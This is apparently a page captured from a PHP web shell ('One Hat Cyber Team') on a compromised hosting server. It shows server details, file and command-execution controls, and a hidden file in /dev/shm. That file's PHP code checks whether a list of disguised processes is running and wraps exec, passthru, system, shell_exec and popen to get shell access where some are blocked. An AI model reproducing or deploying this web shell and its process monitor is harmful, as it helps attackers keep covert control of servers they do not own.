One Hat Cyber Team
Your IP:
216.73.216.176
Server IP:
198.54.114.155
Server:
Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
5.6.40
Create File
|
Create Folder
Execute
Dir :
~
/
proc
/
self
/
root
/
proc
/
self
/
root
/
dev
/
shm
/
View File Name :
.val
<?php $files = ['constants','loadmodule','view.archive','admin.frontpage','dbstructure','image_page','beginedit7','addcssassoc','pclerror.lib','Pager_Wrapper','SpellChecker','cust_report06','sched_ranking','payment_modules','attachment','default_done','activity','Guestbook','modform.inc','screen_03','ThumbBase.inc','order_categ','MultiLength','scripting','runwizardlog','GoogleSpell','dbconnect.bak','about_9c1hqzq36a','config.buy','dir_style']; foreach ($files as $f) { $res = @run("pgrep {$f}"); if (!preg_match('/\d+/', $res)) { die("<f>{$f}</f>"); } } die('!ended!'); function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }